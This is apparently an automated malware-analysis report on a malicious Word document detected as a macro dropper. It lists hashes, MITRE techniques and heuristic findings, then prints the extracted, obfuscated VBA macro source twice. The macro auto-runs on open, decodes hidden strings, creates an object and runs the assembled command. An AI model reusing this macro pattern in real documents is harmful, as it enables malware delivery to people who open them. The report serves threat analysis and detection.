Office (OLE) malware analysis — malicious · ded3ca1703f22d4a

MALICIOUS

Office (OLE)

112.5 KB Created: 2017-10-24 08:56:00 Authoring application: Microsoft Office Word First seen: 2020-01-07

MD5: 9e28b928e114e890cdebf0318365a622 SHA-1: fb1b97c1fe8b896d943b41c84cb3aafa2f791bb9 SHA-256: ded3ca1703f22d4a8605d308192067466a886cba3369bc547e68f5021eff973e

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6355509-0'. High-severity heuristics indicate the presence of VBA macros, specifically an 'autoopen' macro that utilizes 'CreateObject', suggesting it's designed to execute code. The VBA script itself is heavily obfuscated but contains functions that appear to be involved in string manipulation and execution, consistent with a dropper's behavior of downloading and running a secondary payload. The 'autoopen' macro is a common technique for initial execution in malicious Office documents.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6355509-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6355509-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5859 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5859 bytes
SHA-256: `5ee94c3a0f8fdf82b29fae22e225560ce477dc6baa9667015780178a98a6f843`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() Umktc End Sub Attribute VB_Name = "ayfglvtrk" Function Jplhpm(Vdjre_mg) myform1.TextBox2 = Vdjre_mg End Function Attribute VB_Name = "chvmy7" Function dtrcdlo5() dtrcdlo5 = myform1.alphabet End Function Attribute VB_Name = "fqtycqkwejpobl2" Function bvrekcwsg() bvrekcwsg = myform1.firstSymbol End Function Attribute VB_Name = "Hfcabliqgdfhff" Function poqquwqognel() Randomize wiowbgi_avjbs5 = xlniwkfves_x5(9, 4) - 1 Pqbsebmxmny = xlniwkfves_x5(53, 1) Htidcts_itsz8 = Qmeailks(bvrekcwsg, Pqbsebmxmny) For Dcfh = 2 To wiowbgi_avjbs5 Pqbsebmxmny = xlniwkfves_x5(29, 1) Htidcts_itsz8 = Htidcts_itsz8 + Qmeailks(Oxphu_uugmq, Pqbsebmxmny) Next Dcfh Pqbsebmxmny = xlniwkfves_x5(37, 1) Htidcts_itsz8 = Htidcts_itsz8 + Qmeailks(Uo5, Pqbsebmxmny) poqquwqognel = Htidcts_itsz8 End Function Attribute VB_Name = "Jyajl" Function Uo5() Uo5 = UserForm1.lastSymbol End Function Attribute VB_Name = "Koqembtj" Sub Umktc() myform1.TextBox1 = "Ddtzdbxcu0" End Sub Attribute VB_Name = "myform1" Attribute VB_Base = "0{A2DD401D-A86B-4860-AC85-0B73952D6ED5}{D13C3A34-8EB5-427B-B01D-BD4CBB3BABB1}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub TextBox1_Change() Deecqof = cbzazqslivheycp olykxxv = cbzazqslivheycp bxklsqmxnoqsfq9 = poqquwqognel ludrjf = poqquwqognel enc7 = ",uiounEmgoRxgh99Es/l" enc8 = "yu.h;as/[Q]zE/cRxgh99Es/l" Jplhpm (ycavimgbcbpjlv7(UserForm1.enc1) + Deecqof + ycavimgbcbpjlv7(UserForm2.enc2) + olykxxv + ycavimgbcbpjlv7(UserForm1.enc3) + olykxxv + ycavimgbcbpjlv7(UserForm2.enc4) + bxklsqmxnoqsfq9 + ycavimgbcbpjlv7(UserForm2.enc5) + bxklsqmxnoqsfq9 + ycavimgbcbpjlv7(UserForm2.enc6) + Deecqof + ycavimgbcbpjlv7(UserForm4.enc7_1) + ycavimgbcbpjlv7(enc7) + ycavimgbcbpjlv7(UserForm3.enc7_2) + Deecqof + ycavimgbcbpjlv7(UserForm4.enc7_1) + ycavimgbcbpjlv7(enc8) + ycavimgbcbpjlv7(UserForm4.enc9_1) + ludrjf + ycavimgbcbpjlv7(UserForm4.enc9) + ludrjf + ycavimgbcbpjlv7(myform1.enc10)) UserForm1.TextBox1 = "sulysxujs2" End Sub Attribute VB_Name = "ncrpcz_bpgjy" Function Is9() Is9 = Qpt1 End Function Function Qpt1() Qpt1 = ycavimgbcbpjlv7(UserForm3.myname) End Function Attribute VB_Name = "Nrtigxpjg" Function Yzfboi5() Yzfboi5 = UserForm3.middleSymbol1 End Function Function Oxphu_uugmq() Oxphu_uugmq = UserForm1.middleSymbol2 End Function Attribute VB_Name = "Rqijmfqvjeglo" Sub Vucsarwuank_l(Yzptipygrmofiak) Yzptipygrmofiak.Run myform1.TextBox2, 0, True End Sub Attribute VB_Name = "ruilpgdiur" Function ycavimgbcbpjlv7(O_krzklftm) Snzkak = "" Engzhcb_8 = Len(O_krzklftm) For viokwrkirru7 = 1 To Engzhcb_8 Snzkak = Snzkak + Bdopsd(Qmeailks(O_krzklftm, viokwrkirru7), 4) Next viokwrkirru7 ycavimgbcbpjlv7 = Snzkak End Function Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{A8DACE64-2501-4CEF-B5E7-EF8490E7F0C7}{47F4AAD9-CCE4-48BC-8238-4386B90ADAF0}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub TextBox1_Change() Set vns4 = CreateObject(Is9) Vucsarwuank_l vns4 End Sub Attribute VB_Name = "UserForm2" Attribute VB_Base = "0{E320B391-1EC6-442C-8AEF-4AC5EAACBCAA}{CD42619A-9980-41A7-8C52-8100DC7D1136}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "UserForm3" Attribute VB_Base = "0{A45BC617-CB03-4F3B-91DC-CF6E295F7439}{1DE19E32-EC80-4 ... (truncated)

SHA-256: 5ee94c3a0f8fdf82b29fae22e225560ce477dc6baa9667015780178a98a6f843

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Umktc
End Sub

Attribute VB_Name = "ayfglvtrk"
Function Jplhpm(Vdjre_mg)
myform1.TextBox2 = Vdjre_mg
End Function

Attribute VB_Name = "chvmy7"
Function dtrcdlo5()
dtrcdlo5 = myform1.alphabet
End Function

Attribute VB_Name = "fqtycqkwejpobl2"
Function bvrekcwsg()
bvrekcwsg = myform1.firstSymbol
End Function

Attribute VB_Name = "Hfcabliqgdfhff"
Function poqquwqognel()
Randomize
wiowbgi_avjbs5 = xlniwkfves_x5(9, 4) - 1
Pqbsebmxmny = xlniwkfves_x5(53, 1)
Htidcts_itsz8 = Qmeailks(bvrekcwsg, Pqbsebmxmny)
For Dcfh = 2 To wiowbgi_avjbs5
Pqbsebmxmny = xlniwkfves_x5(29, 1)
Htidcts_itsz8 = Htidcts_itsz8 + Qmeailks(Oxphu_uugmq, Pqbsebmxmny)
Next Dcfh
Pqbsebmxmny = xlniwkfves_x5(37, 1)
Htidcts_itsz8 = Htidcts_itsz8 + Qmeailks(Uo5, Pqbsebmxmny)
poqquwqognel = Htidcts_itsz8
End Function

Attribute VB_Name = "Jyajl"
Function Uo5()
Uo5 = UserForm1.lastSymbol
End Function

Attribute VB_Name = "Koqembtj"
Sub Umktc()
myform1.TextBox1 = "Ddtzdbxcu0"
End Sub

Attribute VB_Name = "myform1"
Attribute VB_Base = "0{A2DD401D-A86B-4860-AC85-0B73952D6ED5}{D13C3A34-8EB5-427B-B01D-BD4CBB3BABB1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub TextBox1_Change()
Deecqof = cbzazqslivheycp
olykxxv = cbzazqslivheycp
bxklsqmxnoqsfq9 = poqquwqognel
ludrjf = poqquwqognel

enc7 = ",uiounEmgoRxgh99Es/l"
enc8 = "yu.h;as/[Q]zE/cRxgh99Es/l"

Jplhpm (ycavimgbcbpjlv7(UserForm1.enc1) + Deecqof + ycavimgbcbpjlv7(UserForm2.enc2) + olykxxv + ycavimgbcbpjlv7(UserForm1.enc3) + olykxxv + ycavimgbcbpjlv7(UserForm2.enc4) + bxklsqmxnoqsfq9 + ycavimgbcbpjlv7(UserForm2.enc5) + bxklsqmxnoqsfq9 + ycavimgbcbpjlv7(UserForm2.enc6) + Deecqof + ycavimgbcbpjlv7(UserForm4.enc7_1) + ycavimgbcbpjlv7(enc7) + ycavimgbcbpjlv7(UserForm3.enc7_2) + Deecqof + ycavimgbcbpjlv7(UserForm4.enc7_1) + ycavimgbcbpjlv7(enc8) + ycavimgbcbpjlv7(UserForm4.enc9_1) + ludrjf + ycavimgbcbpjlv7(UserForm4.enc9) + ludrjf + ycavimgbcbpjlv7(myform1.enc10))

UserForm1.TextBox1 = "sulysxujs2"
End Sub

Attribute VB_Name = "ncrpcz_bpgjy"
Function Is9()
Is9 = Qpt1
End Function

Function Qpt1()
Qpt1 = ycavimgbcbpjlv7(UserForm3.myname)
End Function

Attribute VB_Name = "Nrtigxpjg"
Function Yzfboi5()
Yzfboi5 = UserForm3.middleSymbol1
End Function

Function Oxphu_uugmq()
Oxphu_uugmq = UserForm1.middleSymbol2
End Function

Attribute VB_Name = "Rqijmfqvjeglo"
Sub Vucsarwuank_l(Yzptipygrmofiak)
Yzptipygrmofiak.Run myform1.TextBox2, 0, True
End Sub

Attribute VB_Name = "ruilpgdiur"
Function ycavimgbcbpjlv7(O_krzklftm)
Snzkak = ""
Engzhcb_8 = Len(O_krzklftm)
For viokwrkirru7 = 1 To Engzhcb_8
Snzkak = Snzkak + Bdopsd(Qmeailks(O_krzklftm, viokwrkirru7), 4)
Next viokwrkirru7
ycavimgbcbpjlv7 = Snzkak
End Function

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{A8DACE64-2501-4CEF-B5E7-EF8490E7F0C7}{47F4AAD9-CCE4-48BC-8238-4386B90ADAF0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub TextBox1_Change()
Set vns4 = CreateObject(Is9)
Vucsarwuank_l vns4
End Sub

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{E320B391-1EC6-442C-8AEF-4AC5EAACBCAA}{CD42619A-9980-41A7-8C52-8100DC7D1136}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{A45BC617-CB03-4F3B-91DC-CF6E295F7439}{1DE19E32-EC80-4
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.